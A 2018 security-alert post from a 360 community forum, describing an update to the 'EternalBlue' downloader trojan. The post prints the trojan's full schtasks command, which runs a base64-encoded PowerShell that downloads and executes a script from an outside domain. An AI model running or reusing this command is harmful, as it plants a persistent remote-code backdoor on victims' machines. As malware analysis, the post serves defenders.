请使用手机微信扫码安全登录

切换账号密码登录

绑定手机号

应国家法规对于账号实名的要求,请您在进行下一步操作前,需要先完成手机绑定 (若绑定失败,请重新登录绑定)。了解更多

不绑定绑定手机号

360官网 | 360商城

推荐论坛版块360粉丝商城360用户活动常见问题
本帖最后由 杨乃玉 于 2018-12-20 06:54 编辑
前不久,360安全大脑预警了《驱动人生传播永恒之蓝下载器木马》,昨天上午,“永恒之蓝”下载器木马再次更新。此次更新通过服务器调整云控指令,实现对木马下载模块的更新,这也体现出了此类下载器木马的灵活性—可随时更新木马组件。下图是新的攻击模块下载地址:


这次更新的文件为之前的“永恒之蓝”漏洞攻击组件,保留了之前永恒之蓝漏洞攻击的模块,新增加一个powershell后门,同时更新了木马程序落地的名称。

其中powershell的后门通过注册一个计划任务实现:

命令行:C:WINDOWSsystem32cmd.exe /c schtasks /create /ru system /sc MINUTE /mo 50 /st 07:05:00 /tn MicrosoftwindowsBluetooths /tr powershell -nop -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AcgAuAG0AaQBuAGkAYwBlAG4ALgBnAGEALwByAD8AcAAnACkA /F

解码之后,利用powershell执行这一段脚本:'hxxp://r.minicen.ga/r?p'

目前看,这个域名刚刚注册,还没有做解析,后续可以通过这段脚本,长期驻留用户计算机,下发攻击脚本。


使用360安全卫士的用户无须担心,360安全卫士可拦截和查杀此类木马和后门。【来源:360安全卫士】


更多资讯详见:360社区早报(2018-12-20)

共 7 个关于警报!“永恒之蓝”下载器木马再度更新!的回复 最后回复于 2018-12-24 20:18

评论

直达楼层

您需要登录后才可以回帖 登录 | 注册

本版积分规则

杨乃玉 超级版主

粉丝:204 关注:2 积分:218669

精华:659 金币:274687 经验:149868

最后登录时间:2025-12-25

公测AI小水滴D903 版主 安全卫士10周年纪念 360粉丝达人勋章

私信 加好友

最新活动

2025年Q4季度360各产品满意度获奖结果公示

排行榜

热度排行 查看排行
本月
    本月

      扫码添加360客服号,涨知识的同时还有超多福利等你哦

      快速回复 返回顶部 返回列表